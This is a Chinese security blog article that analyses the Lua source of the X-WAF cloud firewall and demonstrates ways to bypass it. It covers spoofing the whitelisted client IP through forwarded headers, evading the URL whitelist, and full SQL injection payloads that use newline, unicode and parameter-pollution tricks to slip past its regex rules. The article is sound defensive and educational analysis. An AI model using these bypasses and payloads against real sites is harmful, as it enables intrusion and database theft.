首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >分析绕过一款适合练手的云 WAF

分析绕过一款适合练手的云 WAF

作者头像
信安之路
发布2018-08-08 15:37:10
1.3K0
发布2018-08-08 15:37:10
举报
文章被收录于专栏:信安之路信安之路信安之路

本文作者:Bypass

X-WAF 是一款适用中、小企业的云 WAF 系统,让中、小企业也可以非常方便地拥有自己的免费云 WAF。

本文从代码出发,一步步理解 WAF 的工作原理,多姿势进行 WAF Bypass。

0x01 环境搭建

官网:

https://waf.xsec.io>

github 源码:

https://github.com/xsec-lab/x-waf

X-WAF 下载安装后,设置反向代理访问构造的 SQL 注入点

0x02 代码分析

首先看一下整体的目录结构,nginx_conf 目录为参考配置(可删除),rules 目录存放过滤规则,init.lua 加载规则,access.lua 程序启动,config.lua 配置文件

主要逻辑实现全部在 util.lua 和 waf.lua 文件。

代码逻辑很简单,先熟悉一下检测流程,程序入口在 waf.lua 第 262-274 行中:

 -- waf startfunction _M.check()    if _M.white_ip_check() then    elseif _M.black_ip_check() then    elseif _M.user_agent_attack_check() then    elseif _M.white_url_check() then    elseif _M.url_attack_check() then    elseif _M.cc_attack_check() then    elseif _M.cookie_attack_check() then    elseif _M.url_args_attack_check() then    elseif _M.post_attack_check() then    else        return    end`

这个一个多条件判断语句,一旦满足前面的条件就不再进行后面的检测。

白名单

首先判断 IP 白名单,我们来看一下 white_ip_check() 函数,同文件下的第 50-64 行:

 -- white ip checkfunction _M.white_ip_check()    if config.config_white_ip_check == "on" then        local IP_WHITE_RULE = _M.get_rule('whiteip.rule')        local WHITE_IP = util.get_client_ip()        if IP_WHITE_RULE ~= nil then            for _, rule in pairs(IP_WHITE_RULE) do                if rule ~= "" and rulematch(WHITE_IP, rule, "jo") then                    util.log_record(config.config_log_dir, 'White_IP', ngx.var_request_uri, "_", "_")                    return true                end            end        end    end

默认配置 IP 白名单是开启状态,读取 IP 白名单规则与获取的客户端 IP 进行比对,我们再来跟进看一下 get_client_ip() 函数,在 util.lua 文件中,第 83-96 行:

 -- Get the client IPfunction _M.get_client_ip()    local CLIENT_IP = ngx.req.get_headers()["X_real_ip"]    if CLIENT_IP == nil then        CLIENT_IP = ngx.req.get_headers()["X_Forwarded_For"]    end    if CLIENT_IP == nil then        CLIENT_IP = ngx.var.remote_addr    end    if CLIENT_IP == nil then        CLIENT_IP = ""    end    return CLIENT_IPend

在这段获取客户端 IP 的代码中,获取的 X_real_ip、X_Forwarded_For 是用户可控的,存在客户端IP地址可伪造的风险。最后再来看一下,rules目录中 whiteip.rule 的默认配置:

[{"Id":74,"RuleType":"whiteip","RuleItem":"8.8.8.8"}]

IP 白名单规则默认 IP:8.8.8.8 为白名单

因此我们可以通过构造 HTTP 请求 Header 实现伪造 IP 来源为 8.8.8.8 ,从而绕过 x-waf 的所有安全防御。

Bypass 测试

先来一张拦截效果图

伪造客户端 IP 绕过:

另外有趣的是,在 blackip.rule 里面,把 8.8.8.8 放置在黑名单里面,但这并没有什么用,IP 白名单已经跳出多条件判断,不会再进行 IP 黑名单检测。CC 攻击的防御也主要是从客户端获取 IP,也可以伪造客户端 IP 轻易绕过限制。

[{"Id":2,"RuleType":"blackip","RuleItem":"8.8.8.8"},{"Id":3,"RuleType":"blackip","RuleItem":"1.1.1.1"}]

同样来看一下 url 白名单 white_url_check() 函数:

 function _M.white_url_check()    if config.config_white_url_check == "on" then        local URL_WHITE_RULES = _M.get_rule('writeurl.rule')        local REQ_URI = ngx.var.request_uri        if URL_WHITE_RULES ~= nil then            for _, rule in pairs(URL_WHITE_RULES) do                if rule ~= "" and rulematch(REQ_URI, rule, "joi") then                    return true                end            end        end    endend

添加了一下 URL 白名单功能,感觉无效,对比了一下 rules 文件,可以发现加载的 rule 文件名不一致。

这里应该是作者的一个笔误,writeurl.rule 和 whiteUrl.rule。

默认 url 白名单配置:

[{"Id":73,"RuleType":"whiteUrl","RuleItem":"/news/"}]

另外,这里使用 ngx.re.find 进行 ngx.var.request_uri 和 rule 匹配,只要 url 中存在 /news/,就不进行检测,绕过安全防御规则。比如 : /test/sql,php/news/?id=1/test/sql,php?id=1&b=/news/ 等形式可绕过。

正则匹配

接下来,我们主要来看一下 M.url_args_attack_check()

 -- deny url argsfunction _M.url_args_attack_check()    if config.config_url_args_check == "on" then        local ARGS_RULES = _M.get_rule('args.rule')        for _, rule in pairs(ARGS_RULES) do            local REQ_ARGS = ngx.req.get_uri_args()            for key, val in pairs(REQ_ARGS) do                local ARGS_DATA = {}                if type(val) == 'table' then                    ARGS_DATA = table.concat(val, " ")                else                    ARGS_DATA = val                end                if ARGS_DATA and type(ARGS_DATA) ~= "boolean" and rule ~= "" and rulematch(unescape(ARGS_DATA), rule, "joi") then                    util.log_record(config.config_log_dir, 'Get_Attack', ngx.var.request_uri, "-", rule)                    if config.config_waf_enable == "on" then                        util.waf_output()                        return true                    end                end            end        end    end    return falseend

M.post_attack_check()

 -- deny postfunction _M.post_attack_check()    if config.config_post_check == "on" then        ngx.req.read_body()        local POST_RULES = _M.get_rule('post.rule')        for _, rule in pairs(POST_RULES) do            local POST_ARGS = ngx.req.get_post_args() or {}            for k, v in pairs(POST_ARGS) do                local post_data = ""                if type(v) == "table" then                    post_data = table.concat(v, ", ")                elseif type(v) == "boolean" then                    post_data = k                else                    post_data = v                end                if rule ~= "" and rulematch(post_data, rule, "joi") then                    util.log_record(config.config_log_dir, 'Post_Attack', post_data, "-", rule)                    if config.config_waf_enable == "on" then                        util.waf_output()                        return true                    end                end            end        end    end    return falseend

两段函数在一定程度上是类似的,使用 ngx.req.get_uri_args、ngx.req.get_post_args 获取数据来源,前者来自 uri 请求参数,而后者来自 post 请求内容,并未对数据进行特殊处理,然后都使用 rulematch(data, rule, "joi") 来进行匹配。

rule 中比较关键 SQL 注入防御规则如下:

`select.+(from|limit)

(?:(union(.*?)select))

(?:from\W+information_schema\W)`

绕过姿势一:%0a

由于使用的是 joi 来修饰,我们可以用 %0a 来进行绕过。

/sql.php?id=1 union%0aselect 1,schema_name,3%0afrom /*!12345information_schema.schemata*/

绕过姿势二:%u 特性

主要利用 IIS 服务器支持 unicode 的解析

/sql.aspx?id=1 union selec%u0054 null,table_name,null fro%u004d information_schema.tables

绕过姿势三:HPP+GPC

使用 GPC 三种方式可以进行参数传递,利用 apsx 特性,将获取到参数拼接起来,可成功 Bypass

/sql.aspx?id=1 union/* POST:Id=2*/select null,system_user,null

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-04-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 环境搭建
  • 0x02 代码分析
    • 白名单
    相关产品与服务
    腾讯云代码分析
    腾讯云代码分析(内部代号CodeDog)是集众多代码分析工具的云原生、分布式、高性能的代码综合分析跟踪管理平台,其主要功能是持续跟踪分析代码,观测项目代码质量,支撑团队传承代码文化。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档